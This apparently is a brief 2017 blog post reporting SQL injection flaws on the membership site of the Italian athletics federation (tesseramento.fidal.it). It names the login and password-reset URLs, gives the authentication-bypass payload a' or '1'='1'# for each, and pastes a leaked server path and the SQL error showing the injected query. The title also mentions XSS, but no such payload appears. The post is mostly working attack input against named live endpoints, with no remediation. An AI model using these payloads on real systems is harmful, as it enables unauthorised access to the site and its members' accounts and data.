Skip to main content

Posts

Showing posts from June, 2017

Fidal.it | simple sql injections and xss

Sql injection

http://tesseramento.fidal.it/gestman/
 a' or '1'='1'#

http://tesseramento.fidal.it/onlinerichiestapassword.htm

a' or '1'='1'#

 /home/webspace/sites/tesseramento.fidal.it/site/php-man/

Select societa.Codice,regioni.descrizione from societa,regioni where societa.AnnoGestione>='2006' and societa.Codice='asdads'' and societa.DataAff='' and societa.Regione=regioni.codice order by AnnoGestione desc: Select societa.Codice,regioni.descrizione from societa,regioni where societa.AnnoGestione>='2006' and societa.Codice='asdads'' and societa.DataAff='' and societa.Regione=regioni.codice order by AnnoGestione desc